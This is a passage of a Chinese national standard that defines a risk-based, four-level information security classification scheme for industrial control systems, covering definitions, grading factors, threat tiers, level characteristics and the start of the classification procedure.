只接受经权威机构批准的第三方认证; d) 组织只采用相关权威机构批准的 ICS 组件第三方认证。
standards
信息安全技术 工业控制系统信息安全分级规范 Information security technology— Information security classification specifications of industrial control systems 信息安全技术 工业控制系统信息安全分级规范 1 范围 本标准规定了基于风险评估的工业控制系统信息安全等级划分规则和定级方法,提出了等级划分 模型和定级要素,包括工业控制系统资产重要程度、存在的潜在风险影响程度和需抵御的信息安全威胁 程度,并提出了工业控制系统信息安全四个等级的特征。 本标准适用于工业生产企业以及相关行政管理部门,为工业控制系统信息安全等级的划分提供指 导,为工业控制系统信息安全的规划、设计、运维以及评估和管理提供依据。 2 规范性引用文件 下列文件对于本文件的应用是必不可少的。凡是注日期的引用文件,仅注日期的版本适用于本文 件。凡是不注日期的引用文件,其最新版本(包括所有的修改单)适用于本文件。 GB/T 22080-2016 信息技术 安全技术 信息安全管理体系 要求 GB/T 31722—2015 信息技术 安全技术 信息安全风险管理 生产安全事故报告和调查处理条例 国务院第493号令 突发环境事件信息报告办法 环境保护部令第17号 3 术语和定义、缩略语 3.1 术语和定义 GB/T 22080—2016 界定的以及下列术语和定义适用于本文件。 3.1.1 信息安全风险 information security risk 特定威胁利用单个或一组资产脆弱性的可能性以及由此可能给组织带来的损害。 注:它以事态的可能性及其后果的组合来度量。 [GB/T 31722—2015,定义3.2] 3.1.2 影响 impact 事件的后果,对已达到的业务目标水平的不利改变。在信息安全中, 一般指不测事件的后果。 [GB/T 31722—2015,定义3.1] 3.1.3 威胁 threat 可能导致对系统或组织的损害的不期望事件发生的潜在原因。 [GB/T 29246—2012,定义2 .45] 3.1.4 安全属性 security attribute 主体、用户(包括外部的 IT 产品)、客体、信息、会话和/或资源的某些特性,这些特性用于定义安全功能需求,并且其值用于实施安全功能需求。 [GB/T 25069—2010,定义2.2.1.18] 3.1.5 可靠性 reliability 预期行为和结果保持一致的特性。 [GB/T 25069—2010,定义2.1.19] 3.1.6 实时性 real-time 在规定时间内系统获得正确结果的反应能力。 注: 一般,实时系统能够及时响应外部事件的请求,并能在一个规定的时间内完成对事件的处理,要求做到逻辑或 功能正确(logical or functional correctness)和时间正确(timing correctness)。 3.1.7 信息安全事件 information security incident 一个或一系列意外或不期望的信息安全事态,它/它们极有可能损害业务运行并威胁信息安全。 [GB/T 29246—2012,定义2.21] 3.2 缩略语 下列缩略语适用于本文件。 DCS:分布式控制系统(Distributed Control System) ICS: 工业控制系统(Industrial control system) IED: 智能电子装置(Intelligent Electronic Device) PCS: 过程控制系统(Process Control System) PLC: 可编程逻辑控制器(Programmalbe Logic Controller) RTU: 远程终端单元(Remote Terminal Unit) SCADA: 数据采集与监视控制系统(Supervisory Control And Data Acquisition) SIS: 安全仪表系统(Safety Instrumented System) 4 工业控制系统概述 4.1 工业控制系统基本构成 工业控制系统(ICS) 是由各种自动化控制组件以及对实时数据进行采集、监测的过程控制组件,共 同构成的确保工业基础设施自动化运行、过程控制与监控的业务流程管控系统。可从以下几方面分析 和确认: a) 工业控制系统组成:主要包括数据采集与监视控制系统(SCADA) 、分布式控制系统(DCS) 、过 程控制系统(PCS) 、可编程逻辑控制器(PLC) 、远程终端单元(RTU) 、 智能电子装置(IED) 、安 全仪表系统(SIS)。 b) 工业控制系统控制过程:通常可由控制回路、人机接口(HMI) 、 远程诊断与维护工具三部分共 同完成,控制回路用以控制逻辑运算,人机接口执行信息交互,远程诊断与维护工具确保出现 异常的操作时进行诊断和恢复。 c) 工业控制系统结构层次:工业控制系统的技术领域、行业特点或者承载业务类型存在较大差 异,不同工业控制系统的技术架构也会有所不同。根据工业控制系统的功能特点和部署形式, 可对一个企业的与工业控制系统相关系统纵向划分为若干层次,如:第1层物理过程、生产装 置,第2层安全和保护系统、基本控制系统,第3层监控系统,第4层运营管理系统,第5层业务规划和物流系统。对于其中第1层~第3层的相关系统、设备,可作为构成工业控制系统的 范围。在实际工业生产系统环境中,可出现相邻两层的功能由一个系统、设备来实现,即在物 理上并未分开,但并不影响所应实现信息安全控制措施的部署。 d) 工业控制系统安全区域:对于比较大的或复杂的工业控制系统,对所有组成部分都采取同样等 级的安全性是不实际的或不必要的,需要将一个工业控制系统划分若干个安全区域、通信网 络。 一个安全区域是采用共同的安全需求的工业控制系统中的一组物理资产,可以是工业控 制系统一个或几个相邻的层,也可以是一个层内部的一部分。 一个安全区域应有一个边界,介 于被包含的和被排斥的元素之间。 一个通信网络是不同安全区域之间连接的载体,具有共同 的安全需求。 4.2 工业控制系统定级对象 对工业控制系统划分信息安全等级,其定级对象是一个具体的完整的工业控制系统,也可以是这个 工业控制系统中相对独立的一部分,包括: a) 一个具体的完整的工业控制系统:应以企业工业自动化生产过程为基础,属于企业的一个自动 化生产全过程或一个工业自动化生产装置(如聚苯乙烯生产装置)的工业控制系统; b) 工业控制系统中相对独立的一部分:是以企业工业自动化生产过程的局部环节为基础,属于企 业的一个自动化生产全过程或一个工业自动化生产装置的工业控制系统中的相对独立的且物 理边界清晰的某个安全区域或通信网络。 通常,对一个具体的完整的工业控制系统定级可偏重于信息安全管理的需要,对工业控制系统中相 对独立的一部分定级可偏重于信息安全防护设计的需要。根据具体需要可对一个具体的完整的工业控 制系统和其中相对独立的一部分分别定级, 一般情况下工业控制系统中相对独立的一部分的信息安全 等级不应高于其整体的工业控制系统的信息安全等级。 5 工业控制系统信息安全等级划分规则 5.1 工业控制系统信息安全等级划分模型 本标准规定的工业控制系统信息安全等级是基于工业控制系统存在的信息安全风险划分的,由工 业控制系统资产重要程度、受侵害后潜在影响程度、需抵御的信息安全威胁程度等三个定级要素决定。 其中: a) 工业控制系统资产重要程度(5.2.1.1):反映了工业控制系统所在工业生产行业领域的重要性, 工业控制系统在企业生产过程中业务使命的重要性,工业控制系统及其相关生产装置以及相 关生产总值等资产综合价值; b) 工业控制系统受侵害后潜在影响程度(5.2.2.1):反映了工业控制系统信息安全受到侵害后产 生的直接损失和间接损失,包括对工业控制系统及其相关生产装置的影响,对工业生产运行安 全的影响,以及对其他受侵害对象(如公民、企业、其他组织的合法权益及重要财产安全,环境 安全、社会秩序、公共利益和人员生命安全,国家安全(特别是其中的国家经济安全))的影响; c) 工业控制系统需抵御的信息安全威胁程度(5.2.3.1):反映了对工业控制系统信息安全可能进 行侵害的主要威胁及其强度;在工业控制系统客观存在的众多威胁中,依据工业控制系统、相 关生产装置以及所属企业或行业本身的固有脆弱性及其可利用性,信息安全事件发生的可能 性,确定实际需要抵御的信息安全威胁,并选择其中最高的威胁程度。 这三个定级要素之间既具有相对独立性,也具有一定的相互叠加效应。定级要素的相对独立性是 指在一个侧面或一定程度上可表示工业控制系统的信息安全等级。定级要素的相互叠加效应是指, 一 个工业控制系统的资产重要程度越高,对受侵害后潜在影响程度的考虑会越多,对需抵御的信息安全威胁程度也会更敏感,反之亦然。基于信息安全风险的考虑,对工业控制系统资产重要程度、受侵害后潜 在影响程度、需抵御的信息安全威胁程度进行综合评价,得出工业控制系统信息安全等级。 本标准对工业控制系统资产重要程度、受侵害后潜在影响程度、需抵御的信息安全威胁程度这三个 和工业控制系统信息安全等级均以其特征值表示,那么工业控制系统信息安全等级特征值与这三个定 级要素的特征值具有一定的函数关系,即这个工业控制系统信息安全等级特征值函数表述为式: Nsu=F((A,NA),(I,N₁),(T,Nr)) 式中: Nsn—— 表示工业控制系统信息安全等级特征值; A —— 表示工业控制系统重要性; NA—— 表示工业控制系统重要程度的可接受特征值,以1~5的尺度来测量; I —— 表示工业控制系统信息安全受侵害后潜在影响; N₁—— 表示工业控制系统信息安全受侵害后潜在影响程度的可接受特征值,以1~5 的尺度来 测量; T —— 表示工业控制系统信息安全威胁; Nr—— 表示工业控制系统信息安全威胁程度的可接受特征值,以1~5的尺度来测量。 这个工业控制系统信息安全等级特征值函数按照表1所述的计算方法解析。工业控制系统信息安 全等级特征值以1~13的尺度来测量,这种尺度被映射到工业控制系统信息安全的四个等级为:工业控 制系统信息安全等级第一级对应特征值取值范围是1~4,第二级是5~7,第三级是8~10,第四级是 11~13。 根据工业控制系统资产重要程度特征值、受侵害后潜在影响程度特征值、需抵御的信息安全威胁程 度特征值,可在表1中查出工业控制系统信息安全等级特征值,及其对应的工业控制系统信息安全 等级。 5.2 工业控制系统信息安全定级要素 5.2.1 工业控制系统资产重要性 5.2.1.1 工业控制系统资产重要程度 工业控制系统资产重要程度是工业控制系统信息安全等级的定级要素之一,由工业控制系统行业 领域(5.2.1.2)和工业控制系统资产价值确定。其中,工业控制系统资产价值包括其作用价值(5.2.1.3) 和获取价值(5.2.1.4)。可反映工业控制系统在国家安全、经济建设、社会生活中的重要程度。 工业控制系统资产重要程度特征值可按表2得出:工业控制系统资产重要程度特征值取值范围从1~5,工业控制系统资产重要程度特征值越高表示工业控制系统资产重要程度越高。 5.2.1.2 工业控制系统行业领域 在工业控制系统资产重要程度要素构成中的工业控制系统行业领域是指,工业控制系统所在的工 业生产行业领域,可分为关键领域、重点领域、 一般领域,具体划分条件如下: a) 关键领域的工业控制系统:是指属于国家关键基础设施中的工业控制系统,国家关键基础设施 是国家的重要战略资源; b) 重点领域的工业控制系统:是指上述关键领域的工业控制系统以外,与国计民生紧密相关的工 业生产领域中的工业控制系统,如核设施、钢铁、有色、化工、石油石化、电力、天然气、先进制 造、水利枢纽、环境保护、铁路、城市轨道交通、民航、城市供水供气供热等; c) 一般领域的工业控制系统:是指上述关键领域和重点领域之外的其他工业生产领域中的工业 控制系统。 5.2.1.3 工业控制系统资产作用价值 工业控制系统资产作用价值是指工业控制系统承担的业务使命、所处生产环节、受依赖程度等情 况,可划分为资产作用价值很高、资产作用价值中等、资产作用价值一般,具体划分条件如下: a) 资产作用价值很高的工业控制系统应符合下列条件之一: 1) 工业控制系统控制对象承担企业工业生产中的关键业务使命; 2) 当工业控制系统控制对象属于工业生产系统的核心生产部位,该控制对象功能受到损害 或丧失会对主要生产流程产生中断或对主要生产流程产生严重影响; 3) 工业生产系统对该工业控制系统的依赖程度高,当该工业控制系统功能受到损害或丧失 时,工业生产系统无法运行或不能正常运行,甚至会发生危险,而且无法通过手工操作使 工业生产系统正常运行; 4) 工业控制系统所属的工业生产系统的生产总值很高。 b) 资产作用价值中等的工业控制系统应符合下列条件之一: 1) 工业控制系统控制对象承担企业工业生产中的重要业务使命; 2) 当工业控制系统控制对象属于工业生产系统的重要生产部位,该控制对象功能受到损害 或丧失会对局部生产流程产生中断或主要生产流程产生较大影响; 3) 工业生产系统对该工业控制系统的依赖程度中等,当该工业控制系统功能受到损害或丧 失时,工业生产系统部分不能正常运行但不会发生危险,而且可通过手工操作辅助工业生 产系统正常运行; 4) 工业控制系统所属的工业生产系统的生产总值中等。 c) 资产作用价值一般的工业控制系统应符合下列条件之一: 1) 工业控制系统控制对象承担企业工业生产中的一般业务使命; 2) 当工业控制系统控制对象属于工业生产系统的生产辅助部位,该控制对象功能受到损害 或丧失不会对主要生产流程产生影响或影响较小; 3) 工业生产系统对该工业控制系统的依赖程度低,当该工业控制系统功能受到损害或丧失 时,可改为手工操作替代该工业控制系统,使工业生产系统相关过程正常运行; 4) 工业控制系统所属的工业生产系统的生产总值一般。 工业控制系统所属的工业生产系统的生产总值评价中“很高”、“中等”、“一般”的具体数值,应依据 工业生产各个行业的价值评价习惯确定。 5.2.1.4 工业控制系统资产获取价值 工业控制系统资产获取价值是指工业控制系统资产的原始成本、更换或再造成本,以及工业控制系统控制范围内相关工业生产装置设施价值等情况,可划分为资产获取价值很高、资产获取价值一般,具 体划分条件如下: a) 资产获取价值很高的工业控制系统应符合下列条件之一: 1) 工业控制系统资产的原始成本很高,或者其控制范围内相关工业生产装置设施价值很高, 或者其抽象价值很高(例如,组织名誉的价值),或者具有一定的稀缺性; 2) 工业控制系统设备本身更换或再造成本很高,或者因事件导致系统可用性、完整性和保密 性的损失,导致生产过程丧失完整性或可用性,以及干扰了生产过程的准确顺序或协调性 而导致的物理资产的破坏而付出的成本很高。 b) 资产获取价值一般的工业控制系统应符合下列条件之一: 1) 工业控制系统资产的原始成本一般,或者其控制范围内相关工业生产装置设施价值一般, 或者其抽象价值一般; 2) 工业控制系统设备本身更换或再造成本一般,或者因事件导致系统可用性、完整性和保密 性的损失,导致生产过程丧失完整性或可用性,以及干扰了生产过程的准确顺序或协调性 而导致的物理资产的破坏而付出的成本一般。 工业控制系统资产获取价值评价中“一般”、“很高”的具体数值,应依据工业生产各个行业的价值评 价习惯确定。 5.2.2 受侵害后的潜在影响 5.2.2.1 受侵害后潜在影响程度 受侵害后潜在影响程度是工业控制系统信息安全等级的定级要素之一,由受侵害的对象(5.2.2.2) 和受侵害的程度(5.2.2.3)确定。 当工业控制系统信息安全受到侵害,因其资产丧失可用性、完整性和保密性等事件会对工业控制系 统本身和其他相关受侵害的对象造成的损害或后果,可能影响到一项或多项资产和业务过程,或者资产 和业务过程的一部分;后果可能是临时性的,也可能是永久性的(当资产被毁灭时)。 工业控制系统信息安全受侵害程度用受侵害后潜在影响程度特征值表示, 工业控制系统受侵害后潜在影响程度特征值取值范围从1~5,工业控制系统受侵害后潜在影响程 度特征值越高表示工业控制系统受侵害后潜在影响程度越高。 5.2.2.2 受侵害的对象 在工业控制系统信息安全受侵害后潜在影响程度划分条件中的受侵害的对象是指,工业控制系统 信息安全受到破坏后,不仅会对工业控制系统本身造成损失,还会对相关工业生产运行安全以及其他相 关受侵害对象安全造成侵害。这些受侵害的对象可划分如下: a) 工业控制系统及相关生产装置安全; b) 工业生产运行安全和公民、企业、其他组织的合法权益及重要财产安全; c) 社会秩序、公共利益、环境安全和人员生命安全; d) 国家安全(特别是其中的国家经济安全1)。 5.2.2.3 受侵害的程度 工业控制系统信息安全受到侵害是指工业控制系统的可用性、完整性、保密性等三个安全目标受到 侵害。通常,工业控制系统信息安全受到侵害时,可用性、完整性、保密性的可能影响值并非总是相同 的,应以三个安全目标中受到影响最高的作为选择依据。 在工业控制系统受侵害后潜在影响程度划分条件中的受侵害的程度是指,工业控制系统信息安全 受到破坏后,因其资产丧失可用性、完整性和保密性等事件分别会造成不同程度的损害或后果,选择各 个受侵害对象的受侵害程度中最大的,确定其受侵害程度。受侵害的程度划分如下: a) 造成一般损害; b) 造成严重损害; c) 造成特别严重损害。 5.2.3 需抵御的信息安全威胁 5.2.3.1 需抵御的信息安全威胁程度 需抵御的信息安全威胁程度是工业控制系统信息安全等级的定级要素之一,由工业控制系统面临 的信息安全威胁(5.2.3.2)和信息安全事件可能性(5.2.3.3)确定。 根据信息安全事件发生的可能性水平对初始已识别的工业控制系统面临所有信息安全威胁(即威 胁列表)进行取舍,包括: a) 当某个初始识别的信息安全威胁造成工业控制系统信息安全事件发生的可能性为“高”时,则 该信息安全威胁应保留,即确认为需要抵御的威胁; b) 当某个初始识别的信息安全威胁造成工业控制系统信息安全事件发生的可能性为“低”时,则 该信息安全威胁可舍去,即确认为不需要抵御的威胁; c) 通过取舍后,在实际需要抵御的众多信息安全威胁中,确定该工业控制系统的最高的信息安全 威胁程度特征值。 对于信息安全威胁造成工业控制系统信息安全事件发生的可能性高低的界限,应依据各个工业生 产行业对安全事件可能性的敏感程度确定。当不能依据各个工业生产行业对安全事件可能性的敏感程 度确定工业控制系统信息安全事件可能性时,可将初始已识别的工业控制系统面临所有信息安全威胁, 结合以往曾发生过的信息安全事件,确定作为定级对象的工业控制系统实际需要抵御的信息安全威胁 程度使用。 1) 国家经济安全,在《国家安全法》第3条中的总体国家安全观,以人民安全为宗旨,以政治安全为根本,以经济安 全为基础,以军事、文化、社会安全为保障,以促进国际安全为依托,维护各领域国家安全,构建国家安全体系, 走中国特色国家安全道路。本标准将国家经济安全作为一个受侵害的对象,是强调工业控制系统信息安全受 侵害后有可能影响到国家经济安全。 工业控制系统需要抵御威胁的程度特征值取值范围从1~5,工业控制系统需要抵御威胁的程度特 征值越高表示工业控制系统需要抵御威胁的程度越高。 5.2.3.2 面临的信息安全威胁 工业控制系统面临信息安全威胁主要从威胁来源、威胁表现形式和威胁程度等方面进行识别,并建 立定级的工业控制系统的威胁列表。对工业控制系统面临信息安全威胁的识别,主要包括: a) 威胁来源,是指威胁主体,可被描述为单个的实体,也可以实体类或实体群体等方式来描述,通 常有: 1) 意外的威胁,是指非恶意人员可能意外地损害工业控制系统资产的所有行为和其他技术 因素,如在职员工误操作、硬件缺陷、软件开发缺陷、能源等公共服务供应失效等; 2) 故意的威胁,是指恶意人员故意地损害工业控制系统资产的所有行为,如心怀不满的在职 员工、无特殊诉求的黑客、心怀不满的离职人员、经济罪犯、恐怖分子、敌对势力或敌对国 家的恶意行为等; 3) 环境的威胁,是指非人为行为的损害工业控制系统资产的所有事件,如地震、洪水、风暴等 自然灾害。 b) 威胁表现形式,是指威胁主体对资产执行的动作,这些动作会影响资产的一个或多个属性,而 资产正是通过这些属性来体现价值的。常见的威胁表现形式主要有: 1) 被动信息收集:可为潜在入侵者提供有价值的信息; 2) 通信攻击:可使工业控制系统的通信中断; 3) 回放攻击:可提供对工业控制系统的访问或伪造工业控制系统的数据; 4) 恶意代码:可采取病毒、蠕虫、自开发代码或木马等形式,给工业控制系统运行带来长期困 扰,甚至严重损坏; 5) 特权升级:攻击者通过获得访问特权及特权的增加,攻击者可采取一些本来能够被防御的 攻击行动; 6) 拒绝服务:可影响工业控制系统网络操作系统或应用资源的可用性,造成重大损失; 7) 社会工程:企图通过哄骗个人来获取安全信息和其他数据,用来攻击工业控制系统; 8) 物理破坏:破坏或使系统物理部件失效(如硬件、软件存储设备、接线、传感器和控制器), 或使得系统执行某个行动,导致部件的物理破坏、毁灭或丧失能力。 c) 根据威胁来源以及威胁表现形式,对工业控制系统面临的信息安全威胁程度进行划分,并给出 相应的信息安全威胁程度特征值: 1) T1: 是指来自占有少量资源且愿意冒少量风险的对手的故意威胁(如个人),一般的环境 威胁, 一般的意外威胁,以及其他相当危害程度的威胁,其威胁程度特征值为1; 2) T2: 是指来自占有少量资源且愿意冒很大风险的对手的故意威胁(如个人、有组织的较小 团体),一般的环境威胁,严重的意外威胁,以及其他相当危害程度的威胁,其威胁程度特 征值为2; 3) T3: 是指来占有中等程度资源且愿意冒少量风险的熟练对手的故意威胁(如有组织的团 体),严重的环境威胁,特别严重的意外威胁,以及其他相当危害程度的威胁,其威胁程度 特征值为3; 4) T4: 是指来占有中等程度资源且愿意冒较大风险的熟练对手的故意威胁(如敌对组织), 严重的环境威胁,特别严重的意外威胁,以及其他相当危害程度的威胁,其威胁程度特征 值为4; 5) T5: 是指来占有丰富程度资源的特别熟练对手的故意威胁(如敌对国家、敌对组织),特别 严重的环境威胁,特别严重的意外威胁,以及其他相当危害程度的威胁,其威胁程度特征 值为5。 对于战争威胁,包括来自国家级别暴力手段的威胁,以及毁灭性自然灾难等意外威胁,不在本标准 考虑范围。 5.2.3.3 信息安全事件可能性 工业控制系统需抵御的信息安全威胁等级确定条件中,信息安全事件发生的可能性是指,工业控制 系统面临特定信息安全威胁发生相应信息安全事件可能性的高低。工业控制系统某个信息安全事件可 能性,应通过特定威胁发生可能性以及脆弱性利用容易度组合来评价。其中: a) 根据5.2.3.2 中的要求建立威胁列表,并对每个威胁逐一分析其发生频度; b) 识别定级的工业控制系统存在的固有脆弱性及其相关因素; c) 对威胁列表中每个威胁逐一分析定级的工业控制系统固有脆弱性被相应威胁可利用容易度; d) 根据固有脆弱性可利用容易度和威胁发生的频度,对威胁列表中每个威胁逐一分析信息安全 事件可能性; e) 对威胁列表的每个威胁逐一给出信息安全事件发生的可能性“高”或“低”的评价。 对于工业控制系统信息安全事件可能性的评价,应依据各工业生产行业对安全事件可能性的敏感 程度确定,得出工业控制系统信息安全事件可能性为“高”或“低”的结论。 5.3 工业控制系统信息安全等级特征 5.3.1 第一级工业控制系统 按照基于风险评估的信息安全等级划分的工业控制系统,第一级应具有以下主要特征: a) 第一级工业控制系统信息安全受到破坏后,会对一般领域的工业生产运行造成损害,或者对公 民、企业和其他组织的合法权益及重要财产造成损害,但不会损害国家安全(特别是其中的国 家经济安全)、环境安全、社会秩序、公共利益和人员生命; b) 第一级工业控制系统的信息安全保护,应使工业控制系统能够抵御来自个人、拥有少量资源的 故意威胁, 一般的环境威胁, 一般的意外威胁,以及其他相当危害程度威胁所造成资产损失的 信息安全风险; c) 第一级工业控制系统应至少具有对系统资产、运行环境、安全风险的基本认识,采取基本的信 息安全控制措施,检测系统异常和安全事件,应急响应的执行和维护等方面的安全保护能力; d) 第一级工业控制系统信息安全应得到所属企业依据国家有关管理规范和技术标准的保护和 管理。 5.3.2 第二级工业控制系统 按照基于风险评估的信息安全等级划分的工业控制系统,第二级应具有以下主要特征: a) 第二级工业控制系统信息安全受到破坏后,会对一般领域的工业生产运行造成重大损害,或者 对重点领域的工业生产运行造成损害,或者对公民、企业和其他组织的合法权益及重要财产造 成严重损害,或者对环境安全、社会秩序、公共利益和人员生命造成损害,但不会损害国家安全 (特别是其中的国家经济安全); b) 第二级工业控制系统的信息安全保护,应使工业控制系统能够抵御来自有组织的团体、拥有中 等资源的故意威胁,一般的环境威胁,严重的意外威胁,以及其他相当危害程度威胁所造成资 产损失的信息安全风险; c) 第二级工业控制系统应至少具有对系统资产、运行环境、安全风险的比较全面认识,初步建立 风险管理战略;采取比较全面的信息安全控制措施;及时检测系统异常和安全事件;应急响应 的执行和维护,防止事件扩大和减轻影响;基本恢复受安全事件影响的工业控制系统运行等方面的安全保护能力; d) 第二级工业控制系统信息安全应得到所属企业依据国家有关管理规范和技术标准的保护和管 理,以及国家主管部门和信息安全监管部门的指导。 5.3.3 第三级工业控制系统 按照基于风险评估的信息安全等级划分的工业控制系统,第三级应具有以下主要特征: a) 第三级工业控制系统信息安全受到破坏后,会对重点领域的工业生产运行造成重大损害,或者 对关键领域的工业生产运行造成损失,或者对环境安全、社会秩序、公共利益和人员生命造成 严重损害,或者会对国家安全(特别是其中的国家经济安全)造成损害; b) 第三级工业控制系统的信息安全保护,应使工业控制系统能够抵御来自敌对组织、有组织的团 体拥有中等程度资源的故意威胁,严重的环境威胁,特别严重的意外威胁,以及其他相当危害 程度威胁所造成资产损失的信息安全风险; c) 第三级工业控制系统应至少具有对系统资产、运行环境、安全风险的全面认识,建立风险管理 战略,实施信息安全治理;采取全面的信息安全控制措施,确保与组织的风险管理战略相一致; 及时和全面监测系统异常和安全事件;应急响应的执行和维护,防止事件扩大和减轻影响;恢 复受安全事件影响的工业控制系统运行等方面的安全保护能力; d) 第三级工业控制系统信息安全应得到所属企业依据国家有关管理规范和技术标准的保护和管 理,以及国家主管部门和信息安全监管部门的监督、检查。 5.3.4 第四级工业控制系统 按照基于风险评估的信息安全等级划分的工业控制系统,第四级应具有以下主要特征: a) 第四级工业控制系统信息安全受到破坏后,会对关键领域的工业生产运行造成重大损害,或者 对环境安全、社会秩序、公共利益和人员生命造成特别严重损害,或者对国家安全(特别是其中 的国家经济安全)造成严重损害; b) 第四级工业控制系统的信息安全保护,应使工业控制系统能够抵御来自敌对组织、拥有丰富资 源的故意威胁,特别严重的环境威胁,特别严重的意外威胁,以及其他相当危害程度威胁所造 成资产损失的信息安全风险; c) 第四级工业控制系统应至少具有对系统资产、运行环境、安全风险的全面认识,建立全面风险 管理战略,实施信息安全治理;采取全面的信息安全控制措施,确保与组织的风险管理战略相 一致;连续和全面监测系统异常和安全事件,采取必要的应对措施;应急响应的执行和维护,防 止事件扩大和减轻影响,采取改进措施;及时恢复受安全事件影响的工业控制系统运行等方面 的安全保护能力; d) 第四级工业控制系统信息安全应得到所属企业依据国家有关管理规范和技术标准的管理,以 及国家主管部门和信息安全监管部门强化的监督、检查。 另外,对于直接用于维护国家安全的工业控制系统,以及需要抵御战争威胁或毁灭性自然灾难等意 外威胁的工业控制系统,不在本标准的等级范围内,可在第四级基础上另行规定增强控制措施。 6 工业控制系统信息安全等级定级方法 6.1 工业控制系统信息安全定级流程 本标准基于风险评估过程规定工业控制系统信息安全定级流程。 依据 GB/T31722—2015, 风险管理应先建立语境,再进入风险评估、风险处置等过程。风险评估 过程由风险分析和风险评价活动组成,其中风险分析包括风险识别及风险估算活动。这与本标准中工业控制系统信息安全定级流程是一致的。定级流程中的确定工业控制系统定级对象,是在建立风险评 估的语境;定级流程中的确定工业控制系统资产重要程度、确定受侵害后的潜在影响程度、确定需抵御 的信息安全威胁程度,属于风险分析的风险识别及风险估算活动;定级流程中的确定工业控制系统信息 安全等级,属于风险评价活动。 6.2 确定工业控制系统定级对象 6.2.1 定级对象的确认条件 确认一个工业控制系统作为定级对象,该工业控制系统应具备如下基本条件: a) 一个具体的完整的工业控制系统: 1) 承载“单一”的工业控制业务应用,属于企业的一个自动化生产过程或一个生产装置(如聚 苯乙烯生产装置)的工业控制系统; 2) 与其他业务应用的控制过程没有交叉或嵌套以及控制信息的交换,且独享所有信息处理 设备、控制设备和受控设备; 3) 以 DCS 或 SCADA 为主构成生产过程控制的自动化系统,可由若干服务器、工程师工作 站、操作员工作站、数据采集接口或控制接口,以及相关网络等其他设施组成。 b) 工业控制系统中相对独立的一部分: 1) 承载“相对独立”的工业控制过程中一部分业务应用或控制过程独立,处于一个工业生产 装置中一个相对独立的区域,与其他业务应用的控制过程有上位或下位关系或少量控制 信息交换,可能会与其他业务应用共享一些设备,如网络传输设备; 2) 这个相对独立的区域一般属于比较大的或复杂的工业控制系统的一个或几个相邻的层、安全区域、通信网络,可按地理位置或管理责任划分,但应具有共同的安全需求; 3) 必要时,起传输作用的工业控制基础网络系统可作为单独的定级对象。 c) 具有工业控制系统的基本要素: 1) 作为定级对象的工业控制系统应该是由相关的自动化控制组件以及对实时数据进行采 集、监测的过程控制组件按照一定的工业控制目标、控制流程和控制规则组合而成的有形 实体,保留完整的控制过程; 2) 一个工业控制系统可由多个厂家的设备与系统组成,所有功能协调一起为工业生产装置 提供整合自动化功能; 3) 避免将某个单一的系统组件,如服务器、控制终端、网络设备、通信路径以及控制部件等作 为定级对象。 d) 具有唯一确定的安全责任单位: 1) 作为定级对象的工业控制系统应能够唯一地确定其安全责任单位,即定级对象的责任单 位应对所定级的工业控制系统具有安全管理责任; 2) 如果一个单位的某个下级单位负责工业控制系统安全建设、运行维护等过程的全部安全 责任,则这个下级单位可以成为工业控制系统的安全责任单位; 3) 如果一个单位中的不同下级单位分别承担工业控制系统不同方面的安全责任,则该工业 控制系统的安全责任单位应是这些下级单位共同所属的单位。 6.2.2 定级对象的系统描述 对定级对象进行系统描述的目的是识别该工业控制系统的任务和使命,即该工业控制系统的任务 要求和它所要达到的能力,包括工业控制系统执行的功能、所需的接口及这些接口相关的能力、所要处 理的信息、所支持的运行结构以及需要抵御的威胁等。 对作为定级对象的工业控制系统描述应包括: a) 工业控制系统的基本信息: 1) 工业控制系统及其归属的工业生产装置的目的、任务和使命; 2) 工业控制系统的控制过程、控制范围、边界、信息流; 3) 工业控制系统的业务体系、技术体系和管理体系等; 4) 形成资产列表、与资产相关的业务过程及其相关性的列表。 b) 工业控制系统的网络及设备部署:包括工业控制系统的物理环境、工业控制系统网络拓扑结 构、工业控制系统及受控设备的部署情况,并明确工业控制系统的边界。 c) 工业控制系统的业务种类和特性:包括工业控制系统涉及的业务种类和受控设备数量,以及工 业控制系统对可用性、实时性、可操作性、完整性、保密性需求及业务特性,如是否形成闭合控 制回路、是否为连续控制系统等。 d) 工业控制系统的系统服务:包括为完成预定的业务目标和任务,提供的操作、控制过程和其他 业务功能,以及这些服务在可用性(如及时有效)、完整性和保密性等方面的重要性。 e) 工业控制系统的业务数据:包括工业控制系统涉及的主要数据及相关协议,以及这些数据在保 密性、完整性和可用性等方面的重要性。 f) 工业控制系统与企业相关信息系统的连接:包括连接方式、接口控制、传输内容,及相关用户范 围和用户类型等。 g) 工业控制系统的管理框架:包括工业控制系统的组织管理结构、管理策略、相关部门设置和部 门在业务运行中的作用、岗位职责。 h) 比较大的或复杂的工业控制系统的安全区域和通讯网络作为定级对象,应描述与相关安全区 域和通讯网络的相互依赖关系。 6.3 确定工业控制系统资产重要程度 6.3.1 评价工业控制系统安全领域和业务使命 评价作为定级对象的工业控制系统重要性相关内容,确认方法如下: a) 按照5.2.1.4的要求,对工业控制系统资产进行分析,确定该工业控制系统的资产价值属于以 下类型之一: 1) 一般资产价值; 2) 很高资产价值。 b) 按照5.2.1.2 的要求,对工业控制系统所属工业生产行业分类进行分析,确定该工业控制系统 的行业领域属于以下类型之一: 1) 一般领域; 2) 重点领域; 3) 关键领域。 c) 按照5.2.1.3的要求,对工业控制系统在工业生产系统中所具有的业务使命进行分析,确定该 工业控制系统的业务使命属于以下类型之一: 1) 一般业务使命; 2) 重要业务使命; 3) 关键业务使命。 6.3.2 评价工业控制系统资产重要程度 根据作为定级对象的工业控制系统行业领域、工业控制系统业务使命,按照5.2.1.1的要求,分析工 业控制系统资产重要性相关内容,依照表2得出工业控制系统资产重要程度特征值,取值范围是由低到 高(1~5),共5个等级。 6.4 确定受侵害后的潜在影响程度 6.4.1 确认工业控制系统信息安全受到破坏 工业控制系统信息安全主要包括保护、维持工业控制系统所采取的可用性、完整性、保密性措施,通 常是指工业控制系统的各种自动化控制组件、数据采集监测等过程控制组件及其系统中的工业控制系 统数据受到保护,且不受偶然的或者恶意的原因而遭到破坏,确保工业生产设施自动化运行、过程控制 与监控的业务流程管控系统连续可靠正常地运行。 工业控制系统信息安全属性主要包括: a) 可用性:是指已授权实体一旦需要就可访问和使用的数据和资源的特性,确保工业控制系统及 其所有部件能够可靠地运行,防止拒绝服务的发生,通常也包含工业控制系统的实时性(时间 响应性,如要求系统响应时间可在毫秒级以内)、可靠性、可控性、业务连续性等; b) 完整性:是指保护工业控制系统资产准确和完整的特性,确保工业控制系统能够以不受损害的 方式执行其预定功能,避免对工业控制系统故意的或意外的未授权操作,确保工业控制相关数 